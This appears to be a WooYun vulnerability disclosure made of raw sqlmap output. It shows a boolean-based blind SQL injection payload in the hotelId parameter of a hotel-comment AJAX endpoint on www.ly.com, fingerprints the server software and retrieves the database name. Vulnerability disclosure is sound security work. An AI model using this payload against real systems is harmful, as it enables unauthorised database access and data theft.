WooYun.org

为了节省大家的时间，我就不上图了
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: hotelId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=getHotelAjaxCotentHtml&hotelId=6192 AND 6290=6290&pageKey=hotelcomments1200&iid=0.8779298369772732
---
[02:48:00] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:48:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[02:48:00] [INFO] fetching current database
[02:48:01] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:48:01] [INFO] retrieved: TCHotelResource
current database: 'TCHotelResource'
[02:50:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.ly.com'